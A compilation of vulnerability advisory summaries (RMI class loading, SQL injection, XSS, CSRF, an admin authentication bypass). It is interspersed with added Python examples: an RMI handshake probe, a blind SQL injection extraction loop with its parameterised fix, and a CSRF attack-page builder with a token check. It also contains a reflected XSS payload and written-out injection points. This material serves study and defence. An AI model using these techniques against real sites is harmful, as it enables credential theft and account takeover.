This module takes advantage of the default configuration of the RMI Registry and RMI Activation services, which allows loading classes from any remote (HTTP) URL. Because it invokes a method of the RMI Distributed Garbage Collector (DGC), which is reachable through every RMI endpoint, it can be used against both rmiregistry and rmid, and against most other (custom) RMI endpoints as well. It does not work against Java Management Extensions (JMX) ports, since those do not support remote class loading, unless another RMI endpoint is active in the same Java process. RMI method calls do not support or require any sort of authentication. Note that since Java 7u21 the JDK sets java.rmi.server.useCodebaseOnly=true by default, which disables loading classes from a client-supplied codebase; targets on older releases, or ones that explicitly set the property to false, remain exposed.
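The absence of authentication is visible in the transport handshake itself. The following added example (not part of the Metasploit module) implements only the JRMP stream-protocol handshake: the client's "JRMI" header, the server's ProtocolAck that echoes the client's address, and the client's reply with its own host/port. It does not build the DGC call or load any class. The offline checks run against a constructed ProtocolAck byte string; `probe()` does the same exchange against a live host.

```python
"""Minimal JRMP (Java RMI wire protocol) stream-handshake probe.

Added example, not code from the Metasploit module. Only the transport
handshake is implemented; no DGC call and no class loading happen here.
"""
import socket
import struct

JRMI_MAGIC = b"JRMI"          # 0x4a524d49
JRMI_VERSION = 2
STREAM_PROTOCOL = 0x4B        # 'K': StreamProtocol
PROTOCOL_ACK = 0x4E           # 'N': server accepted the protocol
PROTOCOL_NACK = 0x4F          # 'O': server rejected the protocol


def build_client_header() -> bytes:
    """First bytes a client sends: magic, 2-byte version, protocol byte."""
    return JRMI_MAGIC + struct.pack(">H", JRMI_VERSION) + bytes([STREAM_PROTOCOL])


def parse_protocol_ack(data: bytes):
    """Parse the server's reply to the header.

    On success the server sends ProtocolAck followed by the client's
    address as it sees it: a DataOutput UTF string (2-byte length + bytes)
    and a 4-byte big-endian int port. Returns (host, port), or None when
    the bytes are not a JRMP ProtocolAck (e.g. an HTTP error page).
    """
    if len(data) < 7 or data[0] != PROTOCOL_ACK:
        return None
    (hlen,) = struct.unpack(">H", data[1:3])
    if len(data) < 7 + hlen:
        return None
    host = data[3:3 + hlen].decode("utf-8")
    (port,) = struct.unpack(">i", data[3 + hlen:7 + hlen])
    return host, port


def build_client_endpoint(host: str, port: int) -> bytes:
    """Second client message: its own host and port, same UTF + int
    encoding. No credential of any kind appears in the exchange."""
    hb = host.encode("utf-8")
    return struct.pack(">H", len(hb)) + hb + struct.pack(">i", port)


def probe(host: str, port: int, timeout: float = 3.0):
    """Live check: does host:port complete a JRMP stream handshake?
    Returns the (host, port) the server echoed back, or None."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_client_header())
        reply = s.recv(256)
        ack = parse_protocol_ack(reply)
        if ack is not None:
            s.sendall(build_client_endpoint("127.0.0.1", 0))
        return ack


# Constructed sample reply (not captured from a real host): ProtocolAck,
# then host "10.0.0.5" and port 40123 as the server would write them.
SAMPLE_ACK = bytes([PROTOCOL_ACK]) + build_client_endpoint("10.0.0.5", 40123)
```

A port that answers the 7-byte header with ProtocolAck is an RMI endpoint; whether the DGC on it will fetch a remote codebase then depends on the JVM version and the useCodebaseOnly property, which the handshake cannot tell you.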
This vulnerability affects sites running Malaysian CMS. It is exploitable by injecting SQL through the vulnerable 'id' parameter in the URL http://127.0.0.1//path/news_body.php?id=[sqli].
Input passed via the 'lang_code' GET parameter to index.php and login.php (handled in '/www/core/language.class.php'), and via the 'login' POST parameter to login.php, is not properly sanitised before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
Input passed via the 'subject', 'name', 'email' and 'body' parameters to the 'contact_us.php' script is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of an affected site.
Versions prior to 2.9.4 suffer from a blind SQL injection in both the 'tag' and 'letter' parameters. The request MUST reach the site with these parameters URL-encoded for the injection to succeed.
Input passed via multiple parameters to multiple scripts is not properly sanitised before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
LiteRadius is vulnerable to multiple blind SQL injection vulnerabilities. Attackers can exploit them by sending maliciously crafted requests to the vulnerable application and can thereby read sensitive information stored in the database, such as usernames and passwords. The PoC provided shows one such crafted request.
Versions prior to 1.2.12 suffer from a blind SQL injection in the 'view' parameter, depending on Xmap's internal cache settings. POST data: option=com_xmap&tmpl=component&Itemid=999&view=[SQL]. Version 1.2.12 has been patched. Older versions with cache=off cannot be exploited in this fashion.
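Several of the advisories above (the news_body.php 'id' parameter, the 'lang_code' and 'login' parameters, the 'tag'/'letter' parameters, LiteRadius, and the Xmap 'view' parameter) describe the same bug class, and the blind ones give the attacker nothing but a true/false page difference. The following is an added example, not code from any of those products: a constructed in-memory SQLite schema, a lookup built by string concatenation the way the vulnerable scripts do it, the same lookup with a bound parameter, and a boolean-based extraction loop that recovers a secret one character at a time through the vulnerable function. SQLite stands in for the sites' real database (on MySQL the equivalent functions are SUBSTRING() and ASCII()); the table and row contents are invented.

```python
"""Blind (boolean-based) SQL injection: vulnerable vs parameterised lookup
and a character-by-character extraction loop. Added example; the schema
and data are constructed, not taken from any real site."""
import sqlite3

# Constructed sample database.
_db = sqlite3.connect(":memory:")
_db.executescript("""
    CREATE TABLE news(id INTEGER PRIMARY KEY, body TEXT);
    CREATE TABLE users(username TEXT, password TEXT);
    INSERT INTO news VALUES (1, 'hello'), (2, 'world');
    INSERT INTO users VALUES ('admin', 's3cret!');
""")


def news_body_vulnerable(id_param: str) -> bool:
    """Mimics news_body.php?id=[sqli]: the raw parameter is pasted into
    the query. Returns whether a row came back, which is all a blind
    attacker observes (the page renders an article or it does not)."""
    sql = "SELECT body FROM news WHERE id = " + id_param
    try:
        return _db.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False


def news_body_fixed(id_param: str) -> bool:
    """Same lookup with a bound parameter: the value is data and can never
    alter the structure of the query."""
    cur = _db.execute("SELECT body FROM news WHERE id = ?", (id_param,))
    return cur.fetchone() is not None


def blind_extract(oracle, subquery: str, max_len: int = 64) -> str:
    """Recover the single string returned by `subquery` using only a
    boolean oracle. Each character is found by binary search over its
    code point (0..127), about 7 requests per character. The injected
    condition is appended to a valid id so the true branch returns the
    existing row."""
    result = ""
    for pos in range(1, max_len + 1):
        if not oracle(f"1 AND length(({subquery})) >= {pos}"):
            break  # past the end of the secret
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(f"1 AND unicode(substr(({subquery}),{pos},1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        result += chr(lo)
    return result


SECRET_QUERY = "SELECT password FROM users WHERE username='admin'"
```

Running `blind_extract(news_body_vulnerable, SECRET_QUERY)` yields the admin password; the same injected strings passed to `news_body_fixed` simply fail to match any row, because the parameter is compared as a value rather than parsed as SQL.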
On the page 'http://127.0.0.1/pandora_console/index.php?sec=usuarios&sec2=operation/users/user_edit' the parameters password_new, password_conf, phone, fullname and e-mail can be submitted via a POST request. Because the form carries no anti-CSRF protection, a crafted HTML page sent to the administrator (the logged-in privileged user) submits it with attacker-chosen values (cross-site request forgery). To patch this vulnerability the developers must integrate an anti-bot system like CAPTCHA in the application, or, more conventionally, a per-session anti-CSRF token that is validated on every state-changing POST.
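The attack page and the token check it fails against, as an added example (not Pandora FMS code): `build_csrf_poc()` produces the auto-submitting form an attacker would host, using the parameter names from the advisory, and `handle_user_edit()` is a hypothetical server-side handler that accepts the change only when the POST carries the synchronizer token stored in the victim's session. The session is modelled as a plain dict; the target URL is the one from the advisory.

```python
"""CSRF PoC page builder and synchronizer-token check. Added example;
the handler and session model are hypothetical stand-ins, not Pandora FMS
code. Parameter names come from the advisory."""
import hmac
import html
import secrets

TARGET = ("http://127.0.0.1/pandora_console/index.php"
          "?sec=usuarios&sec2=operation/users/user_edit")


def build_csrf_poc(target: str, fields: dict) -> str:
    """HTML that POSTs `fields` to `target` as soon as the victim loads it.
    The browser attaches the victim's session cookie by itself, so the
    page needs no knowledge of the session."""
    inputs = "\n".join(
        f'  <input type="hidden" name="{html.escape(k)}" value="{html.escape(v)}">'
        for k, v in fields.items()
    )
    return (
        f'<form id="f" method="POST" action="{html.escape(target)}">\n'
        f"{inputs}\n</form>\n"
        "<script>document.getElementById('f').submit()</script>\n"
    )


# --- mitigation: per-session synchronizer token ---

def issue_csrf_token(session: dict) -> str:
    """Store a fresh random token in the server-side session and return it
    for embedding as a hidden field in the legitimate form."""
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token


def csrf_token_valid(session: dict, form: dict) -> bool:
    """Accept the POST only if it carries the session's token. A cross-site
    page cannot read the victim's session or DOM, so it cannot supply the
    value. Constant-time comparison avoids a timing side channel."""
    expected = session.get("csrf_token")
    supplied = form.get("csrf_token")
    if not expected or not supplied:
        return False
    return hmac.compare_digest(expected, supplied)


def handle_user_edit(session: dict, form: dict) -> bool:
    """Hypothetical user_edit handler: returns True if the profile update
    would be applied, False if the request is rejected."""
    if not csrf_token_valid(session, form):
        return False
    # apply password_new / password_conf / phone / fullname / e-mail here
    return True
```

The forged POST from the PoC page never contains `csrf_token`, so the handler rejects it; the legitimate form, rendered with the token from `issue_csrf_token()`, passes. A CAPTCHA also blocks the automatic submission but degrades the admin's workflow, which is why the token is the usual fix.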
An authentication bypass lets attackers into the site's admin panel. The admin panel's search field is also vulnerable to reflected XSS. Exploit: ">><marquee><h1>XSSed_by_r007k17</h1></marquee>